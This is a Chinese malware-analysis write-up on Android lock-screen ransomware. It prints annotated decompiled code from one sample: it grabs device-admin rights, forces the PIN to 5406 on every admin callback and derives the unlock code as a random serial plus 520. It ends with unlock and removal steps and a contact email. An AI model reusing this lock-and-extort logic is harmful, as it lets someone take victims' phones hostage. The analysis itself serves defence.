锁机病毒小结


锁机勒索病毒主要特征:

1、假冒成各种刷钻、刷人气、刷皮肤等应用,要求激活设备管理器甚至授予root权限。

2、病毒发作后,留下制毒者的联系方式,勒索钱财。

锁机勒索病毒主要代码:

1、激活设备管理器

// Decompiler output, analyst annotation only. Builds and launches the system
// "activate device administrator" prompt so the app can obtain admin rights;
// the enclosing class (M, an Activity) is not shown here.
private void activiteDevice() {
    Class v8;
    M v0 = this;
    // Standard system action that shows the device-admin activation dialog.
    Intent v1 = new Intent("android.app.action.ADD_DEVICE_ADMIN");
    ComponentName v5 = null;
    ComponentName v6 = null;
    M v7 = v0;
    try {
        // The receiver that will get the admin callbacks (the MyAdmin DeviceAdminReceiver).
        v8 = Class.forName("com.cjk.MyAdmin");
    }
    catch(ClassNotFoundException v5_1) {
        throw new NoClassDefFoundError(v5_1.getMessage());
    }
    // Decompiler artifact: a bare super(...) call is not valid Java at this point.
    // Because v5 is what gets passed as the DEVICE_ADMIN extra, this presumably was
    // a ComponentName construction from (v7, v8) -- confirm against the bytecode.
    super(((Context)v7), v8);
    v1.putExtra("android.app.extra.DEVICE_ADMIN", ((Parcelable)v5));
    v0.startActivityForResult(v1, 0);
}
// Activity entry point: the admin prompt is shown immediately on creation,
// i.e. without any further user interaction beyond opening the app.
@Override public void onCreate(Bundle arg6) {
    LogCatBroadcaster.start(this);
    super.onCreate(arg6);
    this.activiteDevice();
}

2、设置PIN码密码

// Decompiler output, analyst annotation only.
// Device-admin receiver of the sample. Every admin callback shown here ends in
// resetPassword(...) with the same hard-coded value 5406, and two of them also
// call lockNow(), which is what keeps the device locked and makes the admin
// hard to deactivate from the UI. This is the behaviour the write-up's
// remediation (enter the correct PIN, then deactivate the admin) works around.
public class MyAdmin extends DeviceAdminReceiver {
    public MyAdmin() {
        super();
    }
    // Fired when the user tries to deactivate the admin: the device is locked
    // and the screen-lock password is set back to 5406 before the request
    // proceeds (the return value is still the default from the superclass).
    @Override public CharSequence onDisableRequested(Context arg10, Intent arg11) {
        String v4 = Integer.toString(5406);
        this.getManager(arg10).lockNow();
        this.getManager(arg10).resetPassword(v4, 0);
        return super.onDisableRequested(arg10, arg11);
    }
    // Fired once the admin is activated: starts the service com.cjk.s and sets
    // the screen-lock password to 5406.
    @Override public void onEnabled(Context arg17, Intent arg18) {
        Class v11;
        MyAdmin v0 = this;
        Context v1 = arg17;
        Intent v2 = arg18;
        String v4 = Integer.toString(5406);
        Intent v8 = null;
        Intent v9 = null;
        Context v10 = v1;
        try {
            // The service class whose onCreate() generates the "serial number".
            v11 = Class.forName("com.cjk.s");
        }
        catch(ClassNotFoundException v8_1) {
            throw new NoClassDefFoundError(v8_1.getMessage());
        }
        // Decompiler artifact: not valid Java here. Since v8 is the Intent that is
        // started below, this presumably was an Intent constructed from (v10, v11)
        // -- confirm against the bytecode.
        super(v10, v11);
        // 268435456 == 0x10000000 == Intent.FLAG_ACTIVITY_NEW_TASK.
        v8.setFlags(268435456);
        v1.startService(v8);
        v0.getManager(v1).resetPassword(v4, 0);
        super.onEnabled(v1, v2);
    }
    // Fired when the device password changes: locks again and forces the
    // password back to 5406, so a user-initiated PIN change does not stick.
    @Override public void onPasswordChanged(Context arg10, Intent arg11) {
        String v4 = Integer.toString(5406);
        this.getManager(arg10).lockNow();
        this.getManager(arg10).resetPassword(v4, 0);
        super.onPasswordChanged(arg10, arg11);
    }
    // Only logs; the fixed tag "------" and message "onReceive-----" are a
    // usable logcat indicator for this sample.
    @Override public void onReceive(Context arg8, Intent arg9) {
        Log.i("------", "onReceive-----");
        super.onReceive(arg8, arg9);
    }
}

3、生成序列号(服务 com.cjk.s 的 onCreate)

// Decompiler output, analyst annotation only. onCreate() of the service
// com.cjk.s (class header not shown). Generates the random "serial number"
// shown to the victim and the derived unlock value, and persists both in the
// SharedPreferences file "Flowers". Fields pass/passw/des/share/editor/ppss/
// password and the helpers DU and is(...) are declared elsewhere in the sample.
@Override public void onCreate() {
    s v0 = this;
    // Appears to be the log hook of the AIDE on-device IDE (package com.aide.ui)
    // -- suggests the sample was built on a phone; verify against the APK.
    ADRTLogCatReader.onContext(v0, "com.aide.ui");
    super.onCreate();
    // Random 8-digit "serial number" (0 .. 99,999,999) from Math.random(), not
    // from a secure source.
    v0.pass = ((long)(Math.random() * (((double)100000000))));
    // The value the victim must enter is simply the serial number plus 520.
    v0.passw = new Long(v0.pass + (((long)520)));
    // DU looks like a symmetric encrypt/decrypt helper keyed by a string; the
    // algorithm is not visible here. The real key is itself stored as
    // ciphertext under the key "flower".
    v0.des = new DU("flower");
    s v4 = v0;
    try {
        v4.des = new DU(v0.des.decrypt("c29fe56fa59ab0db"));
    }
    catch(Exception v4_1) {
        // swallowed: on failure des keeps the "flower" key
    }
    v0.share = v0.getSharedPreferences("Flowers", 0);
    v0.editor = v0.share.edit();
    // First run only: "m" is unset (defaults to 0).
    if(v0.share.getLong("m", ((long)0)) == (((long)0))) {
        // "m" holds the serial number in the clear; "passw" holds the encrypted
        // unlock value. For an analyst these two prefs entries are where the
        // PIN material lives.
        v0.editor.putLong("m", v0.pass);
        v0.editor.commit();
        v4 = v0;
        try {
            v4.editor.putString("passw", v0.des.encrypt(new StringBuffer().append("").append(v0.passw).toString()));
            v0.editor.commit();
        }
        catch(Exception v4_1) {
            // swallowed
        }
        // is(...) is not shown; it decides between the two branches below.
        if(v0.is(v0.getApplicationContext())) {
            v0.ppss = new StringBuffer().append(v0.share.getLong("m", ((long)8))).append("").toString();
            v4 = v0;
            s v5 = v0;
            try {
                v4.password = v5.des.decrypt(v0.share.getString("passw", ""));
            }
            catch(Exception v4_1) {
                // swallowed
            }
            // Decompiler artifact: "100000000" is not a legal class name. Given the
            // .start() call this is presumably a Thread subclass taking the service
            // as its argument -- confirm against the bytecode.
            new 100000000(v0).start();
            return;
        }
        // Otherwise both entries are overwritten with fixed values: "m" with a
        // serial number decrypted from an embedded ciphertext and "passw" with an
        // embedded ciphertext directly. In this branch the pass + 520 relation
        // above is replaced, so the unlock value cannot be derived without the
        // DU key.
        v4 = v0;
        try {
            v4.editor.putLong("m", Long.parseLong(v0.des.decrypt("5a15e58cc8db8d1c700ecb6bb7b627a9")));
            v0.editor.commit();
            v0.editor.putString("passw", "e60b6ba97b41a1c7a31f1228d55280a8243703be7d4aa15c");
            v0.editor.commit();
        }
        catch(Exception v4_1) {
            // swallowed
        }
    }
}

锁屏勒索病毒的应对方法:

1、反编译APK,找出关键代码,得到相应的计算公式,输入正确的密码后取消激活设备管理器,卸载应用。

2、对于加壳类的锁机勒索软件,暂时没有什么好的应对方法;一般只能在手机预先开启了USB调试的情况下,使用ADB命令冻结应用,然后卸载应用,并删除/data/system文件夹下的password.key文件。

如果碰到该类锁机病毒,可以将病毒样本包发送到我的工作邮箱:18300070889@139.com

谢谢
